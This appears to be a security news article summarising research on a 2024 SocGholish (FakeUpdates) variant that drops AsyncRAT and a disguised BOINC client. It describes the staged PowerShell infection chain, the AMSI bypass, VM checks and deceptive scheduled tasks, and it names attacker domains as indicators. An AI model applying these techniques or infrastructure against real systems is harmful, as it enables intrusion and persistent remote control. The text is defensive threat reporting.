Researchers identified a new variant of SocGholish malware (aka FakeUpdates) that has been active since July 4th, 2024. The infection chain remains similar: users visiting compromised websites are tricked into downloading fake browser updates that install additional malware.
The variant exhibits new behaviors compared to previous SocGholish campaigns. After the initial download, additional scripts are executed that deviate from the typical installation of Remote Access Trojans (RATs), like AsyncRAT or NetSupport RAT.
The SocGholish infection starts with a malicious JavaScript download of the next stage payload, which bypasses AMSI security and uses a Domain Generation Algorithm (DGA) to create a random subdomain on rzegzwre.top.
It then retrieves the next stage from the constructed URL via a HTTP GET request using a WebClient object and injects the downloaded content into memory for execution using Invoke-Expression.
A multi-stage process is used to download and execute the final AsyncRAT payload, as stage 2 decodes, decrypts, and decompresses the obfuscated stage 3 using Base64, XOR encryption, and Gzip compression.
Stage 3 checks for signs of a virtual machine environment by looking for specific hardware configurations and assigning a score based on the findings, along with a randomly generated domain name created by a Domain Generation Algorithm (DGA) that is used in a cURL request to download the final payload.
A malicious PowerShell script disguised as a BOINC software installation uses curl to download a file and then creates a directory and executable with random names.
It removes evidence of the download and retrieves a ZIP archive containing a renamed BOINC.exe by creating a scheduled task to execute this renamed executable and setting a registry value as a potential infection marker.
Malicious actors are exploiting the legitimate scientific computing platform BOINC to potentially establish command and control channels on victim machines by delivering BOINC through malware droppers and configuring it to connect to fake BOINC servers (rosettahome.top, rosettahome.cn) instead of legitimate ones.
The BOINC client is disguised with names like trustedinstaller.exe to evade detection. While no malicious tasks have been observed yet, the ability to deliver tasks and potentially additional malware makes infected machines vulnerable to further attacks.
It was found that an AsyncRAT infection was spreading through scheduled tasks, such as “Get-PhysicalExtentAssociation_QoS” that looked like a maintenance task but was actually downloading encrypted PowerShell code from a C2 server.
According to Huntress, another task named “CleanUpMgrTask_1322139014” is associated with a BOINC client, possibly hiding malicious activity.
There are several other scheduled tasks with generic names potentially related to SocGholish malware, which also uses fake browser updates as an initial access method, suggesting a combination of AsyncRAT and SocGholish techniques employed by the attacker.
.webp?w=1200&resize=1200,0&ssl=1&description=Researchers identified a new variant of SocGholish malware (aka FakeUpdates) that has been active since July 4th, 2024.){kind=link}